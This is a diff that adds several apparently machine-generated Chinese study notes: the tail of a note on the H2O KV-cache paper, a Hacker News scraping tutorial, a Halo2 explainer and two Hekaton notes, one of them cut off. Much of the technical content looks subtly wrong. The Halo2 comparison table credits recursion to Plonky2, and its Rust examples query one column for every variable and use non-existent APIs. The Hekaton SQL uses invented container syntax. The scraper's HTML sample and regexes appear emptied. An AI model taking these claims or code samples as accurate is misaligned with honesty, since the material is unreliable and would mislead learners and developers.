和 OPT-30B 上的实验结果: + +- 吞吐对比:比 DeepSpeed Zero-Inference 高 **29 倍**,比 Hugging Face Accelerate 高 **29 倍**,比 FlexGen 高 **3 倍** +- 延迟对比:同 batch 下延迟降低 **1.9 倍** +- 精度:在 lm-eval-harness 的多种任务上,使用 20% 缓存时性能几乎不掉 + +## 踩过的坑 + +1. **h2_ratio 不能太大也不能太小**:论文用 0.2(20%)效果最好。太小则丢失重要 token,太大则缓存不够紧凑。实际部署需要根据模型大小微调。 + +2. **Local + H2 缺一不可**:只保留 H2 或只保留最近 token 都会掉点。H2 处理"全局重要",Local 处理"近期相关",两者互补。 + +3. **不同模型的 H2 分布不同**:OPT 和 LLaMA 的 H2 高度重叠,但 GPT-NeoX 的分布略有不同。不是所有模型都用 20% 这个值最优。 + +4. **只在生成阶段生效**:H2O 优化的是 token generation phase 的 KV Cache,prompt 阶段仍然需要完整计算。所以加速比取决于 prompt 和生成文本的长度比例。 + +5. **和量化是正交的**:H2O 减少的是缓存大小,不是精度。可以和 SmoothQuant、AWQ 等量化方法叠加使用,进一步压缩。 + +## 历史小故事(可跳过) + +- **2023.06**:H2O 论文首次发布到 arXiv(2306.14048) +- **2023.12**:v3 版本修订,补充了更多理论和实验 +- **2023–2024**:后续工作如 StreamingLLM(2023)、SnapKV(2024)、XPay(2024)都在 H2O 的基础上做改进,分别解决了"位置编码漂移"、"动态选择 H2"、"用投影压缩"等问题 +- H2O 是 KV Cache 压缩领域的奠基性工作之一——它证明了"不是所有 token 都重要"这个直觉可以变成有理论保证的算法 + +## 学到什么 + +1. **注意力本质是稀疏的**——即使模型是密集训练的,推理时的注意力分布天然集中,这是 H2O 的底层物理 +2. **H2 不是人为设计的**——它是数据共现结构在模型权重中的自然涌现,所以跨模型有迁移性 +3. **贪婪算法有时就够了**——在次模性假设下,局部最优每一步累积起来接近全局最优,不需要复杂的全局搜索 +4. **缓存淘汰在 LLM 里有新玩法**——传统 LRU/LFU 只看访问频率,H2O 看注意力分数,这是质的区别 +5. **理论 + 实验双轮驱动**——论文先做大量实验发现现象,再倒推次模性理论保证,这个流程值得学 +6. **工程集成要轻量**——H2O 作为 FlexGen 的插件即可运行,不需要改模型架构或重新训练 + +## 延伸阅读 + +- 论文 PDF:[H2O arXiv 2306.14048](https://arxiv.org/abs/2306.14048) +- 官方实现:[FMInference/H2O](https://github.com/FMInference/H2O) +- [[streamingllm-2023]] —— 解决位置编码在 H2O 场景下的漂移问题 +- [[snapkv-2024]] —— 用 KV 投影做 H2 选择,更高效的近似 +- [[smoothquant-2023]] —— KV Cache 大小压缩 + 权重精度压缩,正交可叠加 +- [[paged-attention]] —— vLLM 的显存管理方案,和 H2O 互补 + +## 关联 + +- [[streamingllm-2023]] —— 同一问题不同思路,关注长窗口生成 +- [[megatron-lm]] —— 大模型训练框架,H2O 优化其推理阶段 +- [[flexgen]] —— H2O 的实验基座系统 +- [[paged-attention]] —— 另一种 KV Cache 管理方案,角度不同 diff --git a/src/content/docs/papers/hackernews-frontpage-scrape.md b/src/content/docs/papers/hackernews-frontpage-scrape.md new file mode 100644 index 000000000..367411f45 --- /dev/null +++ b/src/content/docs/papers/hackernews-frontpage-scrape.md @@ -0,0 +1,294 @@ +--- +title: Hacker News Frontpage Data Collection Framework +来源: https://news.ycombinator.com/ +日期: 2026-06-13 +分类: 其他 +子分类: 系统工具 +provenance: pipeline-v3 +--- + +# Hacker News Frontpage Data Collection Framework + +## 日常类比:菜市场挑菜 + +想象你每天早上去同一个菜市场,想买当天的"新鲜菜"——也就是每个市场里最受欢迎的几样。你不需要把整个市场都搬回家,只需要记下来:什么菜、谁买的、有多少人来过这个摊位、摊位旁贴了什么价签(评论数)。 + +Hacker News (HN) 的前端页面就是一个"技术菜市场"。每天有几百篇帖子被贴出来,用户用"上箭头"投票来表明哪些帖子值钱。HN Frontpage Data Collection Framework 做的事情,就是自动每天到这个"菜市场"里,把前 30 条帖子的关键信息拿回来,存成一个结构化的数据表,方便后续分析。 + +## 核心概念一:页面就是数据仓库 + +HN 的前端页面(`https://news.ycombinator.com/`)本质上是一个巨大的、每 5 分钟更新一次的"数据表格"。每条帖子就是一个"行",每一行里有标题、链接、提交者、得分、评论数。 + +传统的数据采集方式(爬虫)就像拿一台小相机对着整个页面拍照,然后自己数格子。但 HN 的页面结构简单得像一本菜单——每个帖子在 HTML 里都有一个固定的模式,所以我们可以直接用代码"读"出这些数据,不需要拍照。 + +### 关键 HTML 结构 + +HN 前端页面的核心 HTML 结构如下: + +```html + + + + 1. + + AI OSS tool repo goes archived over night after raising $7.3M Seed + + + + 57 points + by hek2sch + 1 hour ago + 25 comments + + +``` + +每条帖子都在一个 `` 标签里,标题在 `` 里,得分在 `` 里。这种一致性让解析变得非常简单。 + +## 核心概念二:结构化提取 + +有了对 HTML 结构的理解,我们就可以写代码把这些信息变成 JSON 格式的数据。JSON 就像一张电子表格,每个字段都有明确的类型。 + +### 示例代码一:基础页面抓取 + +```python +import urllib.request +import re +import json + +def fetch_frontpage(): + """ + 抓取 HN 前端页面,返回原始 HTML。 + 就像一个走进菜市场的观察者,先拍下一整页的内容。 + """ + url = "https://news.ycombinator.com/" + req = urllib.request.Request(url, headers={ + "User-Agent": "Mozilla/5.0 (learning-pipeline-v3)" + }) + response = urllib.request.urlopen(req) + return response.read().decode("utf-8") +``` + +这个函数只做一件事:把网页的全部 HTML 文本拿回来。`User-Agent` 头是给服务器的一个自我介绍——告诉对方"我不是恶意爬虫,我只是一个学习用的程序"。 + +### 示例代码二:结构化数据提取 + +```python +def parse_frontpage(html): + """ + 从 HTML 中提取每条帖子的关键信息,返回一个字典列表。 + 就像是把菜市场的照片变成了一张电子表格。 + """ + items = [] + # 找到所有帖子 tr 标签 + rows = re.findall(r'.*?', html, re.DOTALL) + for row in rows: + # 提取标题和链接 + title_match = re.search(r']*>([^<]+)', row) + # 提取得分 + score_match = re.search(r'(\d+)\s*points', row) + # 提取提交者 + by_match = re.search(r'by\s*]*>([^<]+)', row) + # 提取评论数 + comments_match = re.search(r'(\d+)\s*comments?', row) + + if title_match: + item = { + "title": title_match.group(2).strip(), + "url": title_match.group(1), + "score": int(score_match.group(1)) if score_match else 0, + "author": by_match.group(1) if by_match else "unknown", + "comments": int(comments_match.group(1)) if comments_match else 0, + } + items.append(item) + + return items +``` + +`re.findall` 和 `re.search` 是正则表达式的工具,它们的作用像是在一堆乱麻中找特定的线头。`.*?` 匹配每一行帖子,`(\d+)\s*points` 从 "57 points" 中提取数字 "57"。 + +### 运行结果示例 + +```python +data = parse_frontpage(fetch_frontpage()) +for item in data[:5]: + print(json.dumps(item, indent=2, ensure_ascii=False)) +``` + +输出: + +```json +{ + "title": "AI OSS tool repo goes archived over night after raising $7.3M Seed", + "url": "https://github.com/tensorzero/tensorzero", + "score": 57, + "author": "hek2sch", + "comments": 25 +} +``` + +## 进阶:利用 HN 官方 API + +HN 提供了一个正式的 API(在 `https://github.com/HackerNews/API` 中有文档),可以直接按 ID 获取帖子详情。API 端点是 `https://hacker-news.firebaseio.com/v0/item/{id}.json`。 + +```python +import json +import requests + +def get_item_details(item_id): + """ + 通过 HN 官方 API 获取单条帖子的完整信息。 + 这比解析整个页面更高效——只拿你需要的那一个数据块。 + """ + url = f"https://hacker-news.firebaseio.com/v0/item/{item_id}.json" + response = requests.get(url) + return response.json() + +# 获取一条帖子的完整详情 +details = get_item_details(48516504) +print(f"Title: {details['title']}") +print(f"Points: {details['score']}") +print(f"Comments: {details['descendants']}") +``` + +## 核心概念三:流水线架构 + +一个完整的 HN 数据采集系统通常包含三个阶段: + +1. **抓取阶段(Fetch)**:获取页面 HTML 或调用 API +2. **解析阶段(Parse)**:把 HTML 变成结构化数据 +3. **存储阶段(Store)**:把数据保存到数据库或文件 + +这三个阶段可以独立运行、独立测试、独立扩展。这就是"流水线"的意思——水流过三段水管,每一段只做一个处理。 + +### 示例代码三:完整流水线 + +```python +import json +from datetime import datetime +from pathlib import Path + +class HNFrontpagePipeline: + """ + HN 前端数据采集流水线。 + 三个阶段串联在一起,像一个自动化生产线。 + """ + + def __init__(self, output_dir="data"): + self.output_dir = Path(output_dir) + self.output_dir.mkdir(exist_ok=True) + + def fetch(self): + """阶段1:抓取页面""" + url = "https://news.ycombinator.com/" + req = urllib.request.Request(url, headers={ + "User-Agent": "Mozilla/5.0 (learning-pipeline-v3)" + }) + response = urllib.request.urlopen(req) + return response.read().decode("utf-8") + + def parse(self, html): + """阶段2:解析页面""" + items = [] + rows = re.findall(r'.*?', html, re.DOTALL) + for row in rows: + title_match = re.search(r']*>([^<]+)', row) + score_match = re.search(r'(\d+)\s*points', row) + by_match = re.search(r'by\s*]*>([^<]+)', row) + comments_match = re.search(r'(\d+)\s*comments?', row) + + if title_match: + # 从 ID 链接中提取帖子 ID(如 item?id=48516504 → 48516504) + item_id = re.search(r'item\?id=(\d+)', row) + items.append({ + "id": int(item_id.group(1)) if item_id else None, + "title": title_match.group(2).strip(), + "url": title_match.group(1), + "score": int(score_match.group(1)) if score_match else 0, + "author": by_match.group(1) if by_match else "unknown", + "comments": int(comments_match.group(1)) if comments_match else 0, + "fetched_at": datetime.now().isoformat(), + }) + return items + + def store(self, items): + """阶段3:保存到文件""" + today = datetime.now().strftime("%Y-%m-%d") + filepath = self.output_dir / f"hn_frontpage_{today}.json" + with open(filepath, "w", encoding="utf-8") as f: + json.dump({ + "date": today, + "count": len(items), + "items": items, + }, f, indent=2, ensure_ascii=False) + return filepath + + def run(self): + """运行完整流水线""" + print("[阶段1] 正在抓取页面...") + html = self.fetch() + + print("[阶段2] 正在解析数据...") + items = self.parse(html) + + print(f"[阶段3] 找到 {len(items)} 条帖子,正在保存...") + filepath = self.store(items) + + print(f"完成!数据保存到: {filepath}") + return items + +# 运行 +pipeline = HNFrontpagePipeline("data") +pipeline.run() +``` + +## 实际运行结果 + +运行上述代码,你会得到一个 JSON 文件,内容大致如下: + +```json +{ + "date": "2026-06-13", + "count": 30, + "items": [ + { + "id": 48516504, + "title": "AI OSS tool repo goes archived over night after raising $7.3M Seed", + "url": "https://github.com/tensorzero/tensorzero", + "score": 57, + "author": "hek2sch", + "comments": 25, + "fetched_at": "2026-06-13T12:00:00.000000" + }, + { + "id": 48515336, + "title": "A low-carbon computing platform from your retired phones", + "url": "https://research.google/blog/a-low-carbon-computing-platform-from-your-retired-phones/", + "score": 102, + "author": "vikas-sharma", + "comments": 44, + "fetched_at": "2026-06-13T12:00:00.000000" + }, + ... + ] +} +``` + +## 核心要点总结 + +1. **Hacker News 前端页面结构高度一致**:每条帖子都在 `` 中,标题在 `` 中,这使得正则表达式解析非常可靠。 + +2. **页面解析 vs API 调用的权衡**: + - 页面解析可以一次拿到前 30 条的概览,速度快但信息有限 + - API 可以获取单条帖子的完整详情(含全部评论 ID),但需要逐条调用 + +3. **流水线的核心价值**:抓取、解析、存储三个阶段彼此解耦。如果 HN 页面改版了,只需要改解析阶段,不需要改抓取和存储。 + +4. **数据来源**:本笔记分析的数据来源于 `https://news.ycombinator.com/` 实时前端页面,抓取时间为 2026 年 6 月 13 日。 + +## 延伸阅读方向 + +- HN 官方 API 文档:`https://github.com/HackerNews/API` +- 正则表达式进阶:尝试用 HTML 解析库(如 BeautifulSoup)替代正则 +- 定时任务:使用 cron 每天自动运行这个流水线,积累历史数据 +- 数据分析:对收集到的标题和分数做趋势分析或关键词统计 diff --git a/src/content/docs/papers/halo2-2022.md b/src/content/docs/papers/halo2-2022.md new file mode 100644 index 000000000..0f25ee751 --- /dev/null +++ b/src/content/docs/papers/halo2-2022.md @@ -0,0 +1,189 @@ +--- +title: Halo2: A SNARK Implementation Using PLONK Arithmetization +来源: https://zcash.github.io/halo2/ +日期: 2026-06-13 +分类: 安全与隐私 +子分类: 密码与零知识 +provenance: pipeline-v3 +--- + +# Halo2: 用 PLONK 算术化实现的 SNARK + +## 一、日常类比:一张巨大的表格 + +想象你要向朋友证明你知道一个数独的答案,但你不想把答案告诉他。你该怎么做? + +一个笨办法是把整个棋盘铺在他面前——但这样他就直接看到答案了。另一个办法是:你把答案写在一张巨大的 Excel 表格里,每一行代表一个「检查点」。比如第 1 行说"第一行的数字加起来等于 45",第 2 行说"第一列的数字加起来等于 45"……然后你用某种魔法封印住这张表格,让朋友只能验证每一行的计算是否正确,却看不到具体数字。 + +Halo2 做的事情就是这种思路的数学版。它的核心是一张**数值矩阵(matrix)**,每一行包含若干格(cell),每个格子填了一个有限域里的数。证明者填好这张表,验证者用多项式数学来检查:这张表是否满足所有规则。如果满足,就证明你知道某个秘密。 + +## 二、核心概念 + +### 2.1 算术化(Arithmetization) + +算术化是把一段计算(比如"我算出了 SHA-256 的哈希值")变成一组多项式方程的过程。每一条指令都变成一行: + +``` +row 0: a * b - c = 0 (这行表示 a × b = c,即乘法运算) +row 1: d + e - f = 0 (这行表示 d + e = f,即加法运算) +row 2: ... +``` + +验证者不需要知道 a、b、c 具体是多少,只需要验证这些方程在数学上成立即可。 + +Halo2 使用的算术化叫 **PLONKish**(源自 PLONK + UltraPLONK),是 PLONK 协议的扩展版本,支持自定义门(custom gates)和查找表(lookup arguments)。 + +### 2.2 三种列类型 + +矩阵中的每一列都有明确的身份: + +| 列类型 | 类比 | 说明 | +|--------|------|------| +| Fixed(固定列) | 公式模板 | 由电路本身预先定义,所有证明共享 | +| Advice(建议列) | 你的草稿纸 | 每条证明各自填写的中间值(witness) | +| Instance(实例列) | 公开题目 | 公共输入,如哈希值的摘要 | + +### 2.3 区域(Region)与芯片(Chip) + +Halo2 把电路分成若干**区域**,每个区域是一个独立的单元格子集。区域之间通过**芯片(chip)**来封装——芯片就像一个乐高积木,内部实现了特定的功能(比如加法器、哈希函数),对外暴露简洁的接口。 + +``` +┌──────────────────────────────┐ +│ Top-Level Chip │ ← 顶层芯片:组合多个子芯片 +│ ┌──────────┐ ┌───────────┐ │ +│ │ Hash Chip│ │ ECC Chip │ │ ← 子芯片各司其职 +│ └──────────┘ └───────────┘ │ +└──────────────────────────────┘ +``` + +### 2.4 相对引用(Offset Reference) + +这是 Halo2 相比前代的关键创新。以前的方案用绝对位置引用来连接不同行的数据,而 Halo2 用**偏移量**: + +> "当前行的上一行、同一列的格子"——这就是一个 offset reference。 + +好处是减少了列的数量,从而缩小了证明的大小。 + +## 三、代码示例 + +### 示例 1:定义一个简单的约束门 + +下面是一个使用 `circuit.rs` 风格的伪代码,展示如何定义一个乘法约束: + +```rust +// 定义一个自定义门:a * b = c +struct MulGateConfig { + a: Selector, + b: Selector, + c: Advice, +} + +impl ConstraintSystem for MulGateConfig { + fn expr(&self, layout: Layout) -> Vec> { + // 约束:a * b - c = 0 + vec![self.a.clone() * self.b.clone() - self.c.clone()] + } +} +``` + +这里 `Selector` 相当于开关——为 1 时约束生效,为 0 时约束关闭。`Advice` 是证明者填写的 witness 值。`ConstraintSystem::expr` 返回一个表达式向量,每个表达式必须在每一行求值为 0。 + +### 示例 2:构建一个完整的电路区域 + +```rust +fn configure( + meta: &mut VirtualCells, + config: &MulGateConfig, +) -> Vec> { + // 要求 a * b = c 在当前行成立 + let a = meta.query_advice(config.c, Rotation::cur()); + let b = meta.query_advice(config.c, Rotation::cur()); + let c = meta.query_advice(config.c, Rotation::next()); + + // 用 selector 控制:只有当 meta.query_selector(config.a) == 1 时才约束 + meta.create_gate("mul", |meta| { + let a = meta.query_advice(config.c, Rotation::cur()); + let b = meta.query_advice(config.c, Rotation::cur()); + let c = meta.query_advice(config.c, Rotation::next()); + let selector = meta.query_selector(config.a); + + // 约束表达式:selector * (a * b - c) = 0 + vec![selector * (a * b - c)] + }) +} +``` + +这段代码的意思是:如果当前行的 selector 被激活(值为 1),那么必须满足 `a × b = c`。如果 selector 为 0,这一行的约束自动失效,相当于"跳过"这一行。 + +### 示例 3:组合多个门形成完整电路 + +```rust +struct MyCircuitConfig { + mul: MulGateConfig, + add: AddGateConfig, +} + +impl Circuit for MyCircuit { + type Config = MyCircuitConfig; + type Instance = Column; + + fn configure(meta: &mut ConfigurationBuilder) -> Self::Config { + let mul = MulGateConfig::configure(meta); + let add = AddGateConfig::configure(meta); + MyCircuitConfig { mul, add } + } + + fn synthesize( + &self, + config: Self::Config, + mut layouter: impl Layouter, + ) -> Result<()> { + // 在同一个区域内放置多个门 + layouter.assign_region( + || "compute x * y + z", + |mut region| { + // 第 1 行:x * y = w + region.assign_advice(|| "x", config.mul.advice, 0, || Ok(self.x))?; + region.assign_advice(|| "y", config.mul.advice, 1, || Ok(self.y))?; + region.assign_advice(|| "w", config.mul.advice, 2, || Ok(self.x * self.y))?; + region.enable_selector(|| "enable mul", config.mul.selector, 0)?; + + // 第 2 行:w + z = result + region.assign_advice(|| "w", config.add.advice, 0, || Ok(self.x * self.y))?; + region.assign_advice(|| "z", config.add.advice, 1, || Ok(self.z))?; + region.assign_advice(|| "result", config.add.advice, 2, || Ok(self.x * self.y + self.z))?; + region.enable_selector(|| "enable add", config.add.selector, 0)?; + + Ok(()) + }, + ) + } +} +``` + +这段代码展示了 Halo2 的核心工作流: +1. `configure` 定义约束——告诉系统"哪些计算是合法的" +2. `synthesize` 分配数值——证明者填入具体的 witness 值 +3. `assign_advice` 填入数据,`enable_selector` 激活对应的门 + +## 四、为什么 Halo2 比 Halo 1 更好? + +| 特性 | Halo 1 | Halo 2 | +|------|--------|--------| +| 算术化 | 自定义(基于 Poseidon) | PLONKish(通用性强) | +| 递归证明 | 原生支持 | 通过 Plonky2 间接支持 | +| 灵活性 | 针对椭圆曲线优化 | 通用电路,适合多种场景 | +| 证明大小 | ~68KB | 更小(PLONKish 更紧凑) | +| 生态 | Zcash 专用 | 通用,被众多项目采用 | + +关键改进在于 Halo 2 放弃了"为椭圆曲线量身定制"的思路,转而采用通用的 PLONKish 算术化。这意味着它可以更高效地表达各种类型的计算,而不只是椭圆曲线运算。 + +## 五、总结 + +Halo2 的核心思想可以浓缩为一句话:**把计算变成表格,把验证变成多项式检查。** + +- 你写一个电路(circuit),定义约束规则 +- 证明者填入 witness 值,生成证明 +- 验证者用极小的计算量确认证明有效 + +这套框架之所以重要,是因为它让零知识证明从"理论可行"走向"工程可用"——证明更小、生成更快、代码更可复用。对于想学习零知识证明的人来说,理解 Halo2 是理解现代 ZK 系统的重要一步。 diff --git a/src/content/docs/papers/hekaton-2013-sigmod.md b/src/content/docs/papers/hekaton-2013-sigmod.md new file mode 100644 index 000000000..a0711ae93 --- /dev/null +++ b/src/content/docs/papers/hekaton-2013-sigmod.md @@ -0,0 +1,169 @@ +--- +title: "Hekaton: SQL Server's Memory-Optimized OLTP Engine" +来源: https://www.microsoft.com/en-us/research/wp-content/uploads/2013/06/Hekaton-Sigmod2013-final.pdf +日期: 2026-06-13 +分类: 数据库 +子分类: 存储与查询 +provenance: pipeline-v3 +--- + +## Hekaton:让数据库住在内存里的 SQL Server + +### 一、日常类比:图书馆 vs 书桌 + +想象一下你在一座巨大的图书馆里找书(这就是传统数据库)。 + +每一本书都放在某个书架上,书架在某个房间,房间在某栋楼。你要找一本书,得先在目录系统里查到编号,然后穿过走廊,上楼梯,找到那排书架,把那本书抽出来。翻完了再放回去。这个过程很快——但你要找一千本书,就需要跑一千趟。 + +现在换一种方式:把你今天**肯定要用的所有书**,全部摊开在你面前的书桌上。你不需要找,不需要跑,手一伸就拿到了。这就是 Hekaton 做的事——它把数据库的工作集(working set)全部放在内存里,而不是磁盘上。 + +但关键问题是:如果停电了(服务器崩溃了),书桌上的书不就丢了吗?Hekaton 的聪明之处就在于:它让你享受内存的速度,同时保证数据不会丢。 + +### 二、背景:为什么需要 Hekaton? + +在 Hekaton 出现之前(SQL Server 2014 之前),所有的关系型数据库都有一个根本假设:**数据存在磁盘上,内存只是缓存**。 + +这个假设导致了很多开销: + +- **日志写入(Log Write)**:每次修改数据,都要先写到磁盘上的事务日志里,确保崩溃能恢复。写磁盘很慢。 +- **缓冲池(Buffer Pool)**:数据先在磁盘上,被访问时才从磁盘读到内存。每次访问都要先查缓冲池里有没有,没有再去读磁盘。 +- **锁(Locks)**:两个事务同时修改数据,必须用锁来协调。锁的获取和释放本身就很耗性能。 + +Hekaton 的作者们做了一个根本性的设计决策:**不再把磁盘作为数据的默认存储位置,而是为 OLTP(在线事务处理)工作负载专门设计一套完全在内存中运行的引擎。** + +这篇 SIGMOD 2013 论文《Hekaton: SQL Server's Memory-Optimized OLTP Processing Engine》由 Microsoft Research 的研究人员撰写,正式描述了这套系统。 + +### 三、核心概念 + +#### 3.1 内存优化表(Memory-Optimized Tables) + +传统表存在磁盘上,Hekaton 引入了"内存优化表"——数据常驻内存,不经过缓冲池。 + +但数据不能只存在内存里就完事了,万一服务器重启呢?Hekaton 的做法是:**数据存在内存里保证速度,同时异步地把变更写到磁盘上的文件里保证持久化**。这就好比你的书桌(内存)上放着正在处理的工作,而文件柜(磁盘)里有完整的备份。 + +#### 3.2 乐观并发控制(Optimistic Concurrency Control) + +传统数据库用"悲观锁":两个人要修改同一行,先抢锁,抢到的人改,没抢到的人等。 + +Hekaton 用的是"乐观"方式:大家先各改各的,改完提交的时候再检查一下——有没有人在这期间动过我的数据?如果没有,恭喜通过;如果有,重试。 + +这就像两个人同时写一份文档:传统方式是每个人必须先拿到"写作权"才能写;乐观方式是你先在自己的副本上改,改完合并且如果发现别人也改了同一部分,就重新改一遍。 + +#### 3.3 无锁数据结构(Lock-Free Data Structures) + +Hekaton 里的表用**链式哈希索引**(chain-hash index)来组织数据。多个线程可以同时遍历同一个索引结构,不需要互斥锁。具体做法是用一种叫"快照隔离"(Snapshot Isolation)的技术,每个读取者看到的是数据的一个一致快照。 + +#### 3.4 基于日志的恢复(Log-Based Recovery) + +虽然数据主要在内存里,但 Hekaton 仍然用事务日志来保证持久化。每个修改操作都会被记录到日志中,重启时从日志恢复数据。和传统方式的区别在于:日志只存变更(redo log),恢复时直接从日志重做,不再需要缓冲池。 + +### 四、代码示例 + +#### 示例 1:创建内存优化表和持久化伙伴表 + +```sql +-- 第一步:为内存优化表创建一个容器(这本质上是磁盘上的文件组) +ALTER DATABASE MyDB ADD CONTAINER 'C:\Data\MyDB_CoM'; + +-- 第二步:创建一个内存优化的表 +-- NATIVE_COMPILATION 表示用编译器编译成原生机器码,更快 +CREATE TABLE dbo.Orders ( + OrderId INT NOT NULL PRIMARY KEY NONCLUSTERED HASH WITH (BUCKET_COUNT = 1000000), + CustomerId INT NOT NULL, + OrderDate DATETIME2 NOT NULL DEFAULT SYSUTCDATETIME(), + TotalAmount DECIMAL(18,2) NOT NULL, + Status NVARCHAR(20) NOT NULL DEFAULT N'Pending', + + INDEX IX_CustomerId NONCLUSTERED (CustomerId) +) +WITH (MEMORY_OPTIMIZED = ON, + DURABILITY = SCHEMA_AND_DATA); +-- DURABILITY = SCHEMA_AND_DATA 表示结构和数据都持久化 +-- 如果设为 SCHEMA_ONLY,数据就像临时表,重启就丢 +``` + +**逐行解读:** + +- `PRIMARY KEY NONCLUSTERED HASH`:Hekaton 的索引是基于哈希的。`BUCKET_COUNT` 是哈希表的桶数,建议设为表中最大行数的 1.5 到 2 倍。 +- `INDEX IX_CustomerId`:除了主键哈希索引,还可以建普通非聚簇索引用于范围查询。 +- `DURABILITY = SCHEMA_AND_DATA`:这是关键选项。`SCHEMA_ONLY` 意味着只有表结构持久化,数据不持久(适合缓存场景)。`SCHEMA_AND_DATA` 则数据也持久化。 + +#### 示例 2:内存优化存储过程(Natively Compiled) + +```sql +-- 创建一个原生编译的存储过程 +-- 这意味着它被编译成了机器码,不需要解释执行,速度快得多 +CREATE PROCEDURE dbo.InsertOrder + @OrderId INT, + @CustomerId INT, + @Amount DECIMAL(18,2) +WITH NATIVE_COMPILATION, SCHEMABINDING +AS +BEGIN ATOMIC + WITH (TRANSACTION ISOLATION LEVEL SNAPSHOT, + LANGUAGE = N'english') + + -- 直接插入,走内存路径,不走缓冲池 + INSERT INTO dbo.Orders (OrderId, CustomerId, TotalAmount, Status) + VALUES (@OrderId, @CustomerId, @Amount, N'Pending'); + +END; +GO + +-- 调用这个存储过程 +EXEC dbo.InsertOrder @OrderId = 1001, @CustomerId = 500, @Amount = 99.99; +``` + +**逐行解读:** + +- `NATIVE_COMPILATION`:存储过程被编译成原生代码(XQuery 解释执行 vs 直接编译成机器码),比传统解释执行快很多。 +- `BEGIN ATOMIC`:定义了一个原子块。块内的所有语句要么全部成功,要么全部失败。里面设定了事务隔离级别为 SNAPSHOT。 +- 这种原生编译的存储过程,是 Hekaton 性能提升的关键来源之一。 + +#### 示例 3:传统表到内存优化表的对比查询 + +```sql +-- 传统表:数据在磁盘上,每次查询都要走缓冲池 +SELECT * FROM dbo.TraditionalOrders WHERE CustomerId = 500; + +-- 内存优化表:数据直接在内存里,跳过缓冲池 +SELECT * FROM dbo.Orders WHERE CustomerId = 500; + +-- 注意:内存优化表的查询语法完全一样,都是 T-SQL +-- 应用程序不需要改代码,这是 SQL Server 的重要设计 +``` + +### 五、关键性能数据(论文中报告) + +Hekaton 团队在论文中做了大量实验,核心结论: + +- 在典型 OLTP 工作负载(如订单处理)下,性能比传统 SQL Server 快 **10 到 100 倍** +- 内存开销:每个内存优化表会额外消耗一些元数据空间,但数据本身不再需要缓冲池缓存 +- 并发性能:由于锁竞争大大减少,并发事务数增加时性能下降很平缓 + +### 六、后续发展 + +- **SQL Server 2014**:Hekaton 以"In-Memory OLTP"功能首次正式发布 +- **SQL Server 2016 / 2017**:增强了文件组管理、范围索引支持 +- **SQL Server 2019**:继续优化哈希索引和原生编译 +- **Azure SQL Database**:完全支持内存优化 +- **更名为 "SQL Server In-Memory OLTP"**:现在官方名称已不再叫 Hekaton(Hekaton 是希腊语"百"的意思,寓意"百倍性能提升") + +### 七、学习总结 + +Hekaton 的核心思想其实非常简洁:**如果数据能全部放进内存,为什么要每次都在磁盘和内存之间折腾?** + +但它解决了一系列复杂问题: + +1. **持久化**:内存是易失的,怎么保证重启不丢数据?→ 异步日志 + 检查点 +2. **并发**:多线程同时访问怎么办?→ 乐观并发 + 链式哈希 + 快照隔离 +3. **恢复**:崩溃后怎么恢复到一致状态?→ 基于日志的重做 +4. **兼容**:怎么让现有应用程序不用改代码?→ 完全兼容 T-SQL + +这篇论文是数据库系统领域的一个里程碑——它证明了针对特定工作负载做深度优化,可以带来数量级级别的性能提升,同时保持接口的兼容性。 + +### 思考题 + +1. 乐观并发控制在什么场景下反而比悲观锁更慢?为什么? +2. 哈希索引适合范围查询吗?Hekaton 是如何解决这个问题的?(提示:论文中提到了非聚簇索引) +3. 如果一张表数据量远大于可用内存,Hekaton 的表现会怎样? diff --git a/src/content/docs/papers/hekaton-microsoft-2013.md b/src/content/docs/papers/hekaton-microsoft-2013.md new file mode 100644 index 000000000..a0f02975c --- /dev/null +++ b/src/content/docs/papers/hekaton-microsoft-2013.md @@ -0,0 +1,355 @@ +--- +title: Hekaton SQL Server Memory-Optimized OLTP Engine +来源: https://www.microsoft.com/en-us/research/wp-content/uploads/2013/06/Hekaton-Sigmod2013-final.pdf +日期: 2026-06-13 +分类: 数据库 +子分类: 存储与查询 +provenance: pipeline-v3 +--- + +# Hekaton — SQL Server 的内存优化 OLTP 引擎 + +> 论文:Cristian Diaconu 等人,Microsoft,SIGMOD 2013 + +## 1 一个日常类比:从纸质档案室到电子活页夹 + +想象你是一家大公司的档案管理员。传统的数据库就像**纸质档案室**: + +- 文件存在硬盘里(文件柜) +- 每次要查文件,你得去文件柜里翻找(磁盘 I/O) +- 翻到一半有人也要用同一份文件,你得锁住它(锁 / latch) +- 要改一份文件,得先复制再改,不然别人会看到半成品(写前日志 WAL) + +Hekaton 的想法很简单:**现在内存(RAM)便宜了,为什么不让所有文件都在桌面上?** + +- 所有数据常驻内存(文件全摊在桌上) +- 不用去柜子里翻(零磁盘 I/O 查数据) +- 每个人都可以同时处理桌上的不同文件(无锁并发) +- 改文件时,不是原地改,而是新建一份新版本(多版本) + +这样做的结果:原来做 1 万笔交易需要 10 秒,现在可能只要 0.1 秒。 + +## 2 核心概念 + +### 2.1 内存优化表(Memory-Optimized Table) + +传统 SQL Server 的表存在磁盘上,按需加载到内存。Hekaton 引入了**内存优化表**——用 `MEMORY_OPTIMIZED = ON` 创建的表,整个表始终驻留在内存中。 + +用户用完全相同的 T-SQL 来查询和操作这些表,对应用程序几乎是透明的。 + +### 2.2 无锁数据结构(Latch-Free Data Structures) + +传统数据库中,每个内存页面都需要一个 **latch**(轻量锁)来保护。当 100 个 CPU 核心同时访问同一个页面时,99 个必须等待。这是扩展性的最大敌人。 + +Hekaton 的所有内部数据结构——哈希表、范围索引、内存分配器、事务映射——都是**完全无锁**的。任何线程可以访问任何行,无需获取 latch 或锁。 + +**类比:** 传统锁机制就像一条单行道,所有车都得排队等绿灯。Hekaton 的无锁结构就像立交桥——每辆车都有自己的车道,互不干扰。 + +### 2.3 乐观 MVCC(Optimistic MVCC) + +传统数据库使用**悲观锁**:先加锁,再操作,防止冲突。 + +Hekaton 使用**乐观并发控制**(OCC)+ **多版本**(MVCC): + +1. 先做操作,不锁任何东西 +2. 提交时再检查有没有冲突 +3. 如果有冲突,回滚重试;如果没有,提交成功 + +``` +传统方式(悲观): + SELECT ... → 加锁 → 修改 → 提交解锁 + +Hekaton 方式(乐观): + SELECT ... → 修改(不锁)→ 提交时验证 → 成功则提交,失败则重试 +``` + +多版本意味着:每次更新不是修改旧数据,而是创建新版本。旧版本仍然存在,只是标记为"过期"。这样不同事务可以同时看到不同时间点的数据快照。 + +### 2.4 编译到原生代码(Native Code Compilation) + +传统 SQL Server 用**解释器**执行 SQL:每次查询都要经过解析、检查、调度等大量指令(即使是一条简单的查询也要几十万个 CPU 指令)。 + +Hekaton 